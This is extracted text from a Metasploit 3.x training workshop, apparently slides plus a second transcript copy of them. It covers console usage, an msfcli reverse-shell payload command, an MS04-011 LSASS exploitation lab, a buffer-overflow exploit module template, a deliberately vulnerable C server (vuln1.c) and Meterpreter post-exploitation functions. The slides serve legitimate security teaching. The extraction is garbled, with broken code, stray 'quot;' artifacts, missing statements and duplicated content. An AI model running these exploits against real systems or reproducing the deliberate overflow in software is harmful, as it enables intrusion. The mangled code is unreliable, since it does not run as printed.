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Exploitation Frameworks:
Metasploit 3.x Workshop
Steven McGrath


What to Accomplish

 Understanding Metasploit as a user
 Understanding the basics of Ruby
 Understanding Metasploit as a developer
 Understanding Metasploit as a expert


What this is...

 To help better an understanding of Metasploit
 To learn how to use the framework in exploit research
 To learn how to use Metasploit in pen-testing.

What this is NOT...

 l33t h@x0r class
 Reasons why Metasploit is better than everything isn’t
 h@x0ring this network.


You should have...

 Backtrack Image (supplied)
 VMWare Player/Workstation/Fusion (supplied)
 A laptop to run all of this on (NOT supplied)


Starting off

 What is Metasploit?
 How is it used?
 What are other tools?
 What benefits does Metasploit have?

What is it?

 Metasploit is an exploitation framework, NOT a
 vulnerability scanner.


How is it used?

 Primarily an aide in exploitation research.
 Secondarily used in pen-testing.


What are other tools?

 CORE Impact


   CORE Impact = $25,000 USD a year
   CANVAS = $1244 USD + Support
   Open Source = More Options



      Most Metasploit payloads are windows specific.
      The framework is under active development,
      however there are still holes in the framework
      that need to be addressed.


Metasploit as a User

What to cover?

Control Interfaces
Basic usage



Primary interface into Metasploit
Shell-like (with readline)
Will run external commands
Dynamic interaction with Metasploit
Automation capable



  Automation is achieved through resource files. They
  contain a list of commands that msfconsole should
  run as if the user had inputted them and startup of
  the console.


Configuration files?
  msfconsole by default has the ability to store per-
  user configuration data. This is typically stored in
  ~/.msf3 by default.


                                    set          unset
                                  load          unload
                                   use           show
                                  save         sessions
                                  jobs           route
Basic Commands:
                                   info           irb
                               loadpath          back
                                 check          exploit
                                   run           route


msfconsole - set/unset
set - Sets a variable to the specified value. Also can
show a list of variables that can be set when run alone.
unset - Will “unset” or remove the value from a variable
or series of variables.
setg - Global equivilent of set.
unsetg - Global equinilent of unset.
NOTE: local variables will override globals.

msfconsole - load/unload

load - Will load a plugin from the framework. You can
also pass values to optional variables at load.
unload - Will unload a plugin.
loadpath - Adds a module path for the framework to
search and load modules. Useful for custom modules.


msfconsole - show/use

show - Will display lists of modules: auxilary, exploits,
payloads, encoders, and nops.
use - Use changes your context within the framework.
back - Returns you to the global context.


msfconsole - save

save - Saves your current state (e.g. current module
and set variables)

msfconsole - sessions

sessions - Session interations...
  -i - Interacts with the specified session.
  -l - Lists the active sessions.


msfconsole - jobs

jobs - Will display information in reguards to
backgrounded jobs (typically client-side exploits)
  -l - List the active jobs.
  -k - Kills the specified job.


msfconsole - route

route - Allows you to interact with the framework
routing table (useful in “pivoting”).

msfconsole - info

 info - Will display information about the specified


msfconsole - irb

 irb - Provides an interactive ruby shell into the
 framework. This is useful for live scripting and/or
 modification to code.


msfconsole - check/exploit

 check - Checks to see if the specified target is
 vulnerable to an exploit.
 exploit - Will launch an exploit on the specified target.
 run - Will launch an auxiliary module against the
 specified target(s).
 NOTE: Normally checks are not required to exploit a

msfconsole - rcheck/rexploit

 rcheck - Will first reload the module from disk before
 running the check.
 rexploit - Same as rcheck, but will launch the actual



 Commandline Interface
 Arguments are passed to tell Metasploit what to do
 Traditionally used for automation



   ./msfcli exploit/example 
   PAYLOAD=windows/shell/reverse_tcp E


 ./msfcli -h for more info



 Web Interface to Metasploit
 Ruby on Rails application
 The primary interface for Windows




Still under HEAVY development
GTK GUI to Metasploit
Attempt to make Metasploit more like CANVAS and
CORE from the User’s standpoint


Network daemon interface.
Listens on port 55554 for telnet connections.
Useful for sharing a running framework without the
hassle of screen.
  Pivot points

Before we continue...

 From this point on we will be assuming msfconsole


Exploit Me!

 Exploit Module to use: windows/smb/ms04_011_lsass
 Payload: Anything you choose!

 Feel free to ask your classmates and myself :)


Metasploit as a Developer

Metasploit as a Developer

 This will be a hands-on workshop.
 You WILL be writing your own exploit before we leave.
 Due to constraints, we will be focusing viewing a few
 example modules for code examples before the
 workshop portion.


Starting off...

 Getting to know Ruby
 A general understanding of how Metasploit 3.x is built
 Example Code


Getting to know Ruby

 Interpreted, not compiled.
 Object Oriented by design
 The Red-headed stepchild of Python, Perl, and

Getting to know Ruby
 Hello World:

 #!/usr/bin/env ruby

 # This is the hello world

 var1=quot;Hello World!quot;
 print quot;n#{var1}nquot;
 print var1, quot;nquot;

Getting to know Ruby - Lab

 Extend the Basic TCP Server in your materials to
 respond to any input given.


Getting to know Ruby - Lab
require 'socket'
port = 44455
host = localhost
server =,port)
while(session = server.accept)
  while !session.eof?

   session.puts quot;R: #{session.gets}quot;

Metasploit’s Structure - Dirs
 data - Data files for the framework
 documentation - Examples, Guides, etc.
 external - Non-framework software
 lib - Framework Libraries
 modules - Module root for the framework
 plugins - Plugin root for the framework
 scripts - Script root for the framework
 tools - Development tools

Metasploit’s Structure - Dirs
   auxiliary - Auxiliary module root
   encoders - Encoder module root
   exploits - Exploit module root
   nops - NOP module root
   payloads - Payload module root


Metasploit’s Structure

 What is the difference between an exploit and an
 auxiliary module?
   Exploit modules will actually deliver a payload
   Auxiliary modules cover anything else

Metasploit’s Structure



 Ruby Exploitation Library
 Derived from Metasploit 2’s Pex libraries
 Located in lib/rex
 Rex is the base that most of the framework builds upon


Rex Subsystems
   Architectures        Encoding         Exploitation

        I/O             Logging               Nops
  Non-Protocol                           Polymorphic
    Parsers                                Blocks
                        Protocols            Services
     Services           Sockets        Text Manipulation

                      User Interface
Framework Core
Core interface into the framework
Handles the core aspects of the framework
  Module interaction (loading, unloading, etc.)
  Exploitation handling
Located under lib/msf/core

Framework Core Classes

  Framework           Datastore      EncodedPayload

                  EventDispatcher      ExploitDriver
                       Handler       OptionContainer
 Payload                  Plugin         Session


Framework Base

Thin interaction layer between Framework Core and
Modules, Plugins, and User Interfaces

Digging In...

 Now that we have a basic understanding of how the
 framework is built, it’s time to dig into the plugins and
 modules themselves...


Metasploit Plugins

 Plugins extend the framework dynamically.
 Plugins are NOT modules.
 All of the User Interfaces are essentially plugins to the


Metasploit Plugins
 Example Plugins
                        msfd                    Threading

                      Session       Session
                                                 IPS filters
                       hooks        taggers

Metasploit Plugins
  module Msf
  class Plugin::Example < Msf::Plugin
 module ExampleExtension
 def example_ext
 quot;This is a Testquot;
 def initialize(framework, options)
  end                                                      58

 Framework Modules

  Modules are used for specific uses within the
  Modules use an extensible, well-defined interface for
  interaction within the framework.
  All modules inherit from Msf::Module.


 Metasploit Modules
Common Hash Keys                    Name         String
                             Description         String
                                  Version        String
                                   Author        Array
                                     Arch        Array
                                 Platform   PlatformList
                                      Ref        Array
                                 License         String

Example Module
require 'msf/core'
module Msf
class Auxiliary::Scanner::HTTPScanner < Msf::Auxiliary

 include Exploit::Remote::Tcp

 include Auxiliary::Scanner

 def initialize


 'Name'            => 'HTTP Scanner',

 'Author'          => 'Maniac <>',

 'Description' => %q{Scans for HTTP Servers in RHOSTS.}




 Opt::RPORT(80),;SENDSTRINGquot;, [ false,
                quot;String to send if port is openquot;, quot;HEAD / HTTP/1.0nnquot; ])

 ], self.class )


    Example Module

   def run_host(ip)



 data = sock.get_once

 print_status(ip + quot;nReceived: quot; + data + quot;nquot;)




    Framework Modules - Lab

      Use the Lab module template and extend it to buffer
      overflow with the following information
        Return: 0xbfbfed20
        76 Bytes + [target.ret].pack('V') + payload.encode

Metasploit as an Expert


Tasty Good Stuff!



Attack Automation

Attack Automation

Attack automation can happen in a number of different
  Full Automation


Resource Files for msfconsole.
Custom shell scripts that interact with msfcli.
Custom auxiliary modules.
  Existing Nessus Data
  Existing Nmap Data


Full Automation

  db_nmap - Will scan a network with nmap and then
  exploit based on what it put into the database.




Extensible - extensions can be written to enhance
Powerful - Flexible protocol and channelized
Stealthy - No disk access and no new process.
   In Memory DLL injection


Metaterpreter - OMGWTF!
This is how it works:
 1.Metasploit sends first stage payload.
 2.Payload talks back to Metasploit.
 3.Metasploit sends second stage containing a DLL
   injection payload.
 4.Metasploit sends the metaterpreter server DLL
 5.DLL injection payload loads the server DLL in
 6.Metaterpreter client and server communicate over
   the establiched channels.
Metaterpreter - UI
            Method                      Description
disable_keyboard               Disables the Keyboard
disable_mouse                  Disables the Mouse
enable_keyboard                Enables the Keyboard
enable_mouse                   Enables the Mouse
idle_time                      Returns idle time in seconds


 Metaterpreter - Filesystem
            Method                      Description
chdir(path)                    Change Directories
delete(path)                   Delete Directory
download(dst, src, resursive   Download Content to Local
entries(path)                  Show Contents of Directory
getwd                          Get the Working Directory
mkdir(path)                    Make Directory
upload(dst, src, recursive)    Upload Content to Host


 Metaterpreter - Filesystem

              Method                    Description

 download(dest, files)          Downloads Files to Local

 expand_path(path)             Expands Env Strings in Path

 stat(path)                    Returns info on file

 upload(dest, files)            Uploads Files to Remote

Metaterpreter - Filesystem
               Method                      Description
(file, [r,w])                    Opens file
close                           Closes file
read(length)                    Reads X bytes from file
seek(offset, whence)            Seeks to offset in file
write(buffer)                   Writes buffer to the file


 Metaterpreter - Networking
               Method                      Description
add_route(s, n, g)              Adds route
each_interface                  Displays interfaces
each_route                      Displays routes
get_interfaces                  Returns array of interfaces
get_routes                      Returns array of routing table
remove_route(s, n, g)           Removes route


 Metaterpreter - Config

               Method                   Description

getuid                          Returns Process UID

revert_to_self                  Calls RevertToSelf
                                Returns System Name and
                                Host Information

Metaterpreter - Power

             Method                    Description

  reboot(reason)               Reboots Host

  shutdown(force, reason)      Shuts down Host


  Metaterpreter - Processes
             Method                    Description
 each_process                  Displays running processes
 execute(path, args, opts)     Executes binary
 getpid                        Returns current process
 kill(pid)                     Kills process
 processes                     Returns array of processes
 open(pid, perms)              Opens process


  Metaterpreter - Registry
           Method                      Description
close_key(hk)                  Closes an open key
create_key(hk, bk, perm)       Creates new key
delete_key(hk, bk, recursive) Deletes key
delete_value(hk, name)         Deletes reg value
enum_key(hk)                   Returns array of subkeys
open_key(hk, bk, perm)         Opens a reg key
query_value(hk, name)          Returns reg value
set_value(hk, name, type, val) Sets reg value               81
Metaterpreter - Memory
           Method                     Description
allocate(len, prot, base)     Allocates memory
free(base, len)               Deallocates memory
lock(base, len)               Lock pages in memory
protect(base, len, prot)      Changes page protectors
query(base)                   Queries info on an address
read(base, len)               Reads memory
write(base, len)              Writes memory


 Metaterpreter - Threads

             Method                    Description

create(entry, param)          Creates a new thread

each_thread                   Displays running threads

get_threads                   Returns array of threads


 Metaterpreter - Images
             Method                     Description
each_image                    Displays loaded images
get_images                    Returns array of images
get_procedure_address(b, n) Gets address of proceedure
load(path)                    Loads DLL
unload(base)                  Unloads DLL


maniac_scanner.rb                                                     2007-09-04
require 'msf/core'

module Msf

class Auxiliary::Scanner::ExampleScanner < Msf::Auxiliary

  # Exploit mixins should be added first
  include Exploit::Remote::Tcp

  # Scanner mixin should be included last
  include Auxiliary::Scanner

  def initialize
      'Name'        => 'Generic Scanner Template',
      'Author'      => 'Maniac <>',
      'Description' => %q{
        Connect to every host specified in the RHOSTS
      network range, send a probe, read a response, and
      print that response to the screen.

        # Specify the predefined RPORT option

        # Specify a new option containing the string to send to the server;SENDSTRINGquot;, [ false, quot;The string to sendquot;, quot;HEAD /
HTTP/1.0nnquot; ])

        ], self.class )


  # Work with a single IP address at a time
  def run_host(ip)

    # Call the connect() method provided by the TCP mixin
    # This is equivalent to connect()
                                    - 1/2 -
maniac_scanner.rb                                              2007-09-04

      data = sock.get_once
      print_status(ip + quot; Received: quot; + data)

    # Call the disconnect() method provided by the TCP mixin
    # This is equivalent to disconnect()


                                      - 2/2 -
#!/usr/bin/env ruby

##### Example TCP Server Lab #####
# In this lab you will be modifying the
# code to return any input to the client.

require 'socket'

# Lets define the port and host.
port = 44455
host = localhost

# Create a new server connection.
server =,port)

# Lets stay active as long as we are
# accepting connections.
while(session = server.accept)

  # As long as we do not terminate
  # our client, lets stay within this
  # context.
  while !session.eof?

    # Something should go here ;)


                                       - 1/1 -
example.rb                                                          2007-09-04
require 'msf/core'

module Msf

class Exploits::Linux::Example < Msf::Exploit::Remote
  include Exploit::Remote::Tcp

  def initialize(info = {})
      'Name'                => 'Example Buffer Overflow Exploit',
      'Description'         => %q{
      'Author'              => [ 'Maniac' ],
      'Arch'                => ARCH_X86,
      'License'             => MSF_LICENSE,
      'Version'             => '$Revision: 4961 $',
      'DefaultOptions'      =>
         'EXITFUNC' => 'thread',
      'Payload'             =>
            'Space'            => 200,
            'StackAdjustment' => -3500,
      'Platform'            => 'linux',
      'Targets'             =>
              'Ret' => 0xbfbfec80
      'DefaultTarget'       => 0))

      ], self.class)
                                     - 1/2 -
example.rb                                   2007-09-04

  def exploit

      buf = pattern_create(2000)



                                   - 2/2 -
Predefined Variables                   Ruby arguments
                                                         $!        Exception information        -c     Check
                                                         $@        Array of backtrace           -d     Debug
                                                         $&        String of last match         -e     One Line
                                                         $`        String left of last match    -h     Help
                                                         $‘        Str right of last match      -n     gets loop
Types             Expressions       Variables            $+        Last group of last match     -rL    require L
12345             if expr [then]    local                $N        Nth group of last match      -v     verbose
                  elsif expr
123.45                              @instance            $~        Info about last match        -w     warnings
1.23e-4                             @@class              $=        Case insensitive flag        -y     comp debug
0xFF00                              CONSTANT             $/        Input record separator
                  unless expr
0b01100                                                  $        Output record separator      Reserved Words
                                    Operators and
1..5                                                     $,        Output field separator
                  else                                                                          alias
1...5                                                    $.        Line number of last file     and
                  expr if expr
‚a‘..‘z‘                                                 $>        Default output               BEGIN
                  expr unless
‚a‘...‘z‘                                                $_        Last input line of string    begin
                  expr              **
‚string sq‘                                              $*        Command line args            break
                  case expr         +-!~
„string dq“                                              $0        Name of script
                  when comp                                                                     case
„#{expr}“                                                $$        Process number               class
                  end               << >>
„trn“                                                 $“        Module names loaded          def
                  while expr [do]   &
%q(string sq)                                            $stderr   Standard error output
                  end                                                                           defined?
%Q(string dq)                                            $stdin    Standard input
                  until expr [do]                                                               do
                                    > >= < <=
%(string dq)                                             $stdout   Standard output              else
                                    <=> == === !=
<<id string id
                  while expr
:symbol                                                  Regex                                  END
/regex/opt                                               .         all characters
                  until expr                                                                    end
                                    .. ...
%r|regex|                                                []        any single char in set
                  for var in expr                                                               ensure
                                    = ( += -= )
[1, 2, 3]                                                [^ ]      any single char not in set   false
%w(1 2 3)                                                *         zero or more                 for
                                    and or
                  expr.each [do]
%W(1 2 #{expr})                                          +         one or more
                  end                                                                           if
{1=>2, :s=>‘v‘}                                          ?         zero or one
                  break next redo                                                               in
                  retry                                  |         alteration                   module
Exceptions                                               ()        Group                        next
begin             Module/Class                           ^         Beginning of line or str     nil
rescue ex =>
                  module Name                            $         End of line or string        not
var                                 ARGF
else                                                     {1,5}     1 to 5                       or
                  class Name
                                                         A        Beginning of a string        redo
                                                         b        Word boundary                rescue
                  class Name <
                  Sup                                    B        Non-word boundary            retry
onError                                                  d        digit, same as [0..9]        return
                  class << obj
RangeError                                               D        Non-digit                    self
SecurityError                                            s        Whitespace                   super
IOError                                                  S        Non-whitespace
                  name(args...)                                                                 then
IndexError                                               w        Word-character               true
                  def inst.
RuntimeError                                             W        Non-word-character           undef
                                                         z        End of a string
                  end                                                                           unless
                                                         Z        End of string, before nl
                  public                                                                        until
                  attr_writer                                                                   yield
                  alias new old

                                          © 2006 — available free from
Object                               Array                                File
Obj#class -> class                   Array::new (int [,obj]) -> array     File#new (path, modestring)-> file
Obj#freeze -> object                 Array#clear                          File#new (path, modestring) do
                                                                          |file| ... end
Obj#frozen? -> true or false         Array#map! do |x| ... end
                                                                          File#open (path, modestring) do
Obj#inspect -> string                Array#delete (value) -> obj or nil
                                                                          |file| ... end
Obj#is_a? (class) -> true or false   Array#delete_at (index)-> obj or n
                                                                          File#exist? (path) -> t or f
Obj#methods -> array                 Array#delete_if do |x| ... end
                                                                          File#basename (path [,suffix]) ->
Obj#respond_to? (sym) -> true or     Array#each do |x| ... end            string
                                     Array#flatten! -> array              File#delete (path, ...)
Obj#to_s -> string
                                     Array#include? (value) -> t or f     File#rename (old, new)
                                     Array#insert (idx, obj...)-> array   File#size (path) -> integer
String                               Array#join ([string]) -> string      r      Read-only, from beginning
Str#[num, num/range/regx] -> str     Array#length -> integer              r+     Read-write, from beginning
Str#capitalize! -> string            Array#pop -> obj or nil              w      Write-only, trunc. / new
Str#center (int [,str]) -> str       Array#push (obj...) -> array         w+     Read-write, trunc. / new
Str#chomp! ([str]) -> str
                                                                          a      Write-only, from end / new
Str#count -> integer
                                                                          a+     Read-write, from end / new
Str#delete! ([string]) -> string
                                                                          b      Binary (Windows only)
Str#downcase! -> string
                                     Hash#delete (key) -> obj or nil
Str#each ([str]) do |str| ... end
                                     Hash#delete_if do |k, v| ... end     Dir
Str#each_line do |line| ... end
                                     Hash#each do |k, v| ... end          Dir[string] -> array
Str#gsub! (rgx) do |match| ... end
                                     Hash#has_key? (k) -> true or false   Dir::chdir ([string])
Str#include? (str) -> true / false
                                     Hash#has_value? (v) -> t or f        Dir::delete (string)
Str#index (str/reg [,off]) -> int
                                     Hash#index (value) -> key            Dir::entries (string) -> array
Str#insert (int, string) -> string
                                     Hash#keys -> array                   Dir::foreach (string) do |file|
Str#length -> integer                                                     ... end
                                     Hash#length -> integer
Str#ljust (int [,padstr]) -> str                                          Dir::getwd -> string
                                     Hash#select do |k, v| ... end ->
Str#rindex (str/reg [,off]) -> int   array                                Dir::mkdir (string)
Str#rjust (int [,padstr]) -> str     Hash#values -> array                 Dir::new (string)
Str#scan (rgx) do |match| ... end                                         Dir::open (string) do |dir| .. end
Str#split (string) -> array                                               Dir#close
Str#strip! -> string                                                      Dir#pos -> integer
                                     assert (boolean [,msg])
Str#sub! (rgx) do |match| ... end                                         Dir#read -> string or nil
                                     assert_block (message) do ... end
Str#swapcase! -> string                                                   Dir#rewind
                                     assert_equal (expected, actual
Str#to_sym -> symbol
                                     assert_in_delta (exp, act, dlt
Str#tr! (string, string) -> string                                        DateTime
Str#upcase! -> string                                                     DateTime::now
                                     assert_kind_of (klass, object
                                                                          DateTime::parse (str)
Kernel                                                                    DateTime::strptime (str, format)
                                     assert_match (pattern, string
block_given?                                                              DateTime#day
                                     assert_nil (object [,msg])
eval (str [,binding])                                                     DateTime#hour
                                     assert_no_match (pattern, string
raise (exception [,string])                                               DateTime#leap?
fork do ... end => fixnum or nil                                          DateTime#min
                                     assert_not_equal (expected, actual
proc do ... end => proc                                                   DateTime#month
print (obj)                                                               DateTime#sec
                                     assert_not_nil (object [,msg])
warn (msg)                                                                DateTime#wday
                                     assert_not_same (expected, actual
                                     [,msg])                              DateTime#year
                                     assert_respond_to(obj, method
                                     assert_same (expected, actual

Doc:                   © 2006 — available free from
vuln1.c                                                                  2007-09-04
#include   <stdio.h>
#include   <sys/types.h>
#include   <sys/socket.h>
#include   <netinet/in.h>

#define LISTEN_PORT 5432

int main() {
  char buf[64];

  int sock;
  int peersock;
  struct sockaddr_in my_addr;
  int reuse = 1;

  if((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {

  if(setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse)) == -1) {

  memset(&my_addr, 0, sizeof(my_addr));
  my_addr.sin_family = AF_INET;
  my_addr.sin_port = htons(LISTEN_PORT);
  if(bind(sock, (struct sockaddr *)&my_addr, sizeof(my_addr)) == -1) {

  if(listen(sock, 5) == -1) {

  if((peersock = accept(sock, NULL, 0)) == -1) {
                                    - 1/2 -
vuln1.c                                         2007-09-04

    if(read(peersock, buf, 4096) == -1) {


                                      - 2/2 -

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Metasploit Basics

  • 2. Exploitation Frameworks: Metasploit 3.x Workshop Steven McGrath 1 What to Accomplish Understanding Metasploit as a user Understanding the basics of Ruby Understanding Metasploit as a developer Understanding Metasploit as a expert 2 What this is... To help better an understanding of Metasploit To learn how to use the framework in exploit research To learn how to use Metasploit in pen-testing. 3
  • 3. What this is NOT... l33t h@x0r class Reasons why Metasploit is better than everything isn’t h@x0ring this network. 4 You should have... Backtrack Image (supplied) VMWare Player/Workstation/Fusion (supplied) A laptop to run all of this on (NOT supplied) 5 Starting off What is Metasploit? How is it used? What are other tools? What benefits does Metasploit have? 6
  • 4. What is it? Metasploit is an exploitation framework, NOT a vulnerability scanner. 7 How is it used? Primarily an aide in exploitation research. Secondarily used in pen-testing. 8 What are other tools? CORE Impact CANVAS 9
  • 5. Benefits? Price CORE Impact = $25,000 USD a year CANVAS = $1244 USD + Support Flexibility Open Source = More Options 10 Downsides? Flexibility Most Metasploit payloads are windows specific. Completeness The framework is under active development, however there are still holes in the framework that need to be addressed. 11 Metasploit as a User 12
  • 6. What to cover? Control Interfaces Basic usage 13 msfconsole Primary interface into Metasploit Shell-like (with readline) Will run external commands Dynamic interaction with Metasploit Automation capable 14 msfconsole Automation? Automation is achieved through resource files. They contain a list of commands that msfconsole should run as if the user had inputted them and startup of the console. 15
  • 7. msfconsole Configuration files? msfconsole by default has the ability to store per- user configuration data. This is typically stored in ~/.msf3 by default. 16 msfconsole set unset load unload use show save sessions jobs route Basic Commands: info irb loadpath back check exploit run route 17 msfconsole - set/unset set - Sets a variable to the specified value. Also can show a list of variables that can be set when run alone. unset - Will “unset” or remove the value from a variable or series of variables. setg - Global equivilent of set. unsetg - Global equinilent of unset. NOTE: local variables will override globals. 18
  • 8. msfconsole - load/unload load - Will load a plugin from the framework. You can also pass values to optional variables at load. unload - Will unload a plugin. loadpath - Adds a module path for the framework to search and load modules. Useful for custom modules. 19 msfconsole - show/use show - Will display lists of modules: auxilary, exploits, payloads, encoders, and nops. use - Use changes your context within the framework. back - Returns you to the global context. 20 msfconsole - save save - Saves your current state (e.g. current module and set variables) 21
  • 9. msfconsole - sessions sessions - Session interations... -i - Interacts with the specified session. -l - Lists the active sessions. 22 msfconsole - jobs jobs - Will display information in reguards to backgrounded jobs (typically client-side exploits) -l - List the active jobs. -k - Kills the specified job. 23 msfconsole - route route - Allows you to interact with the framework routing table (useful in “pivoting”). 24
  • 10. msfconsole - info info - Will display information about the specified module(s). 25 msfconsole - irb irb - Provides an interactive ruby shell into the framework. This is useful for live scripting and/or modification to code. 26 msfconsole - check/exploit check - Checks to see if the specified target is vulnerable to an exploit. exploit - Will launch an exploit on the specified target. run - Will launch an auxiliary module against the specified target(s). NOTE: Normally checks are not required to exploit a target. 27
  • 11. msfconsole - rcheck/rexploit rcheck - Will first reload the module from disk before running the check. rexploit - Same as rcheck, but will launch the actual exploit. 28 msfcli Commandline Interface Arguments are passed to tell Metasploit what to do Traditionally used for automation 29 msfcli Example: ./msfcli exploit/example RHOST= LHOST= PAYLOAD=windows/shell/reverse_tcp E 30
  • 12. msfcli ./msfcli -h for more info 31 msfweb Web Interface to Metasploit Ruby on Rails application The primary interface for Windows 32 33
  • 13. 34 msfgui Still under HEAVY development GTK GUI to Metasploit Attempt to make Metasploit more like CANVAS and CORE from the User’s standpoint 35 msfd Network daemon interface. Listens on port 55554 for telnet connections. Useful for sharing a running framework without the hassle of screen. Pivot points Exploits Sessions 36
  • 14. Before we continue... From this point on we will be assuming msfconsole 37 Exploit Me! Target: Exploit Module to use: windows/smb/ms04_011_lsass Payload: Anything you choose! Feel free to ask your classmates and myself :) 38 Metasploit as a Developer 39
  • 15. Metasploit as a Developer This will be a hands-on workshop. You WILL be writing your own exploit before we leave. Due to constraints, we will be focusing viewing a few example modules for code examples before the workshop portion. 40 Starting off... Getting to know Ruby A general understanding of how Metasploit 3.x is built Example Code Lab 41 Getting to know Ruby Interpreted, not compiled. Object Oriented by design The Red-headed stepchild of Python, Perl, and SmallTalk 42
  • 16. Getting to know Ruby Hello World: #!/usr/bin/env ruby # This is the hello world Application var1=quot;Hello World!quot; print quot;n#{var1}nquot; print var1, quot;nquot; 43 Getting to know Ruby - Lab Extend the Basic TCP Server in your materials to respond to any input given. 44 Getting to know Ruby - Lab require 'socket' port = 44455 host = localhost server =,port) while(session = server.accept) while !session.eof? session.puts quot;R: #{session.gets}quot; end end 45
  • 17. Metasploit’s Structure - Dirs data - Data files for the framework documentation - Examples, Guides, etc. external - Non-framework software lib - Framework Libraries modules - Module root for the framework plugins - Plugin root for the framework scripts - Script root for the framework tools - Development tools 46 Metasploit’s Structure - Dirs modules auxiliary - Auxiliary module root encoders - Encoder module root exploits - Exploit module root nops - NOP module root payloads - Payload module root 47 Metasploit’s Structure What is the difference between an exploit and an auxiliary module? Exploit modules will actually deliver a payload Auxiliary modules cover anything else 48
  • 18. Metasploit’s Structure 49 Rex Ruby Exploitation Library Derived from Metasploit 2’s Pex libraries Located in lib/rex Rex is the base that most of the framework builds upon 50 Rex Subsystems Architectures Encoding Exploitation I/O Logging Nops Non-Protocol Polymorphic Payload Parsers Blocks Post-Exploit Protocols Services Clients Services Sockets Text Manipulation User Interface 51
  • 19. Framework Core Core interface into the framework Handles the core aspects of the framework Module interaction (loading, unloading, etc.) Exploitation handling Plugins Sessions Located under lib/msf/core 52 Framework Core Classes Framework Datastore EncodedPayload EventDispatcher ExploitDriver Module Auxiliary Encoder Handler OptionContainer Exploit Nop Payload Plugin Session 53 Framework Base Thin interaction layer between Framework Core and Modules, Plugins, and User Interfaces 54
  • 20. Digging In... Now that we have a basic understanding of how the framework is built, it’s time to dig into the plugins and modules themselves... 55 Metasploit Plugins Plugins extend the framework dynamically. Plugins are NOT modules. All of the User Interfaces are essentially plugins to the framework. 56 Metasploit Plugins Example Plugins Database msfd Threading support Session Session IPS filters hooks taggers 57
  • 21. Metasploit Plugins module Msf class Plugin::Example < Msf::Plugin module ExampleExtension def example_ext quot;This is a Testquot; end end def initialize(framework, options) framework.extend(ExampleExtension) end end end 58 Framework Modules Modules are used for specific uses within the framework. Modules use an extensible, well-defined interface for interaction within the framework. All modules inherit from Msf::Module. 59 Metasploit Modules Common Hash Keys Name String Description String Version String Author Array Arch Array Platform PlatformList Ref Array License String 60
  • 22. Example Module require 'msf/core' module Msf class Auxiliary::Scanner::HTTPScanner < Msf::Auxiliary include Exploit::Remote::Tcp include Auxiliary::Scanner def initialize super( 'Name' => 'HTTP Scanner', 'Author' => 'Maniac <>', 'Description' => %q{Scans for HTTP Servers in RHOSTS.} ) register_options( [ Opt::RPORT(80),;SENDSTRINGquot;, [ false, quot;String to send if port is openquot;, quot;HEAD / HTTP/1.0nnquot; ]) ], self.class ) end 61 Example Module def run_host(ip) connect sock.put(datastore['SENDSTRING']) data = sock.get_once print_status(ip + quot;nReceived: quot; + data + quot;nquot;) disconnect end end end 62 Framework Modules - Lab Use the Lab module template and extend it to buffer overflow with the following information Host: Return: 0xbfbfed20 76 Bytes + [target.ret].pack('V') + payload.encode 63
  • 23. Metasploit as an Expert 64 Tasty Good Stuff! Automation Metaterpreter 65 Attack Automation 66
  • 24. Attack Automation Attack automation can happen in a number of different ways: Psudo-Automated Full Automation 67 Psudo-Automation Resource Files for msfconsole. Custom shell scripts that interact with msfcli. Custom auxiliary modules. db_autopwn Existing Nessus Data Existing Nmap Data 68 Full Automation db_autopwn db_nmap - Will scan a network with nmap and then exploit based on what it put into the database. 69
  • 25. Metaterpreter 70 Metaterpreter Extensible - extensions can be written to enhance metaterpreter. Powerful - Flexible protocol and channelized communication. Stealthy - No disk access and no new process. In Memory DLL injection 71 Metaterpreter - OMGWTF! This is how it works: 1.Metasploit sends first stage payload. 2.Payload talks back to Metasploit. 3.Metasploit sends second stage containing a DLL injection payload. 4.Metasploit sends the metaterpreter server DLL 5.DLL injection payload loads the server DLL in memory 6.Metaterpreter client and server communicate over the establiched channels. 72
  • 26. Metaterpreter - UI client.ui Method Description disable_keyboard Disables the Keyboard disable_mouse Disables the Mouse enable_keyboard Enables the Keyboard enable_mouse Enables the Mouse idle_time Returns idle time in seconds 73 Metaterpreter - Filesystem client.fs.dir Method Description chdir(path) Change Directories delete(path) Delete Directory download(dst, src, resursive Download Content to Local entries(path) Show Contents of Directory getwd Get the Working Directory mkdir(path) Make Directory upload(dst, src, recursive) Upload Content to Host 74 Metaterpreter - Filesystem client.fs.file Method Description download(dest, files) Downloads Files to Local expand_path(path) Expands Env Strings in Path stat(path) Returns info on file upload(dest, files) Uploads Files to Remote 75
  • 27. Metaterpreter - Filesystem Method Description (file, [r,w]) Opens file close Closes file read(length) Reads X bytes from file seek(offset, whence) Seeks to offset in file write(buffer) Writes buffer to the file 76 Metaterpreter - Networking Method Description add_route(s, n, g) Adds route each_interface Displays interfaces each_route Displays routes get_interfaces Returns array of interfaces get_routes Returns array of routing table remove_route(s, n, g) Removes route 77 Metaterpreter - Config client.sys.config Method Description getuid Returns Process UID revert_to_self Calls RevertToSelf Returns System Name and sysinfo Host Information 78
  • 28. Metaterpreter - Power client.sys.power Method Description reboot(reason) Reboots Host shutdown(force, reason) Shuts down Host 79 Metaterpreter - Processes client.sys.process Method Description each_process Displays running processes execute(path, args, opts) Executes binary getpid Returns current process kill(pid) Kills process processes Returns array of processes open(pid, perms) Opens process 80 Metaterpreter - Registry client.sys.registry Method Description close_key(hk) Closes an open key create_key(hk, bk, perm) Creates new key delete_key(hk, bk, recursive) Deletes key delete_value(hk, name) Deletes reg value enum_key(hk) Returns array of subkeys open_key(hk, bk, perm) Opens a reg key query_value(hk, name) Returns reg value set_value(hk, name, type, val) Sets reg value 81
  • 29. Metaterpreter - Memory process.memory Method Description allocate(len, prot, base) Allocates memory free(base, len) Deallocates memory lock(base, len) Lock pages in memory protect(base, len, prot) Changes page protectors query(base) Queries info on an address read(base, len) Reads memory write(base, len) Writes memory 82 Metaterpreter - Threads process.thread Method Description create(entry, param) Creates a new thread each_thread Displays running threads get_threads Returns array of threads 83 Metaterpreter - Images process.image Method Description each_image Displays loaded images get_images Returns array of images get_procedure_address(b, n) Gets address of proceedure load(path) Loads DLL unload(base) Unloads DLL 84
  • 30. Q&A 85
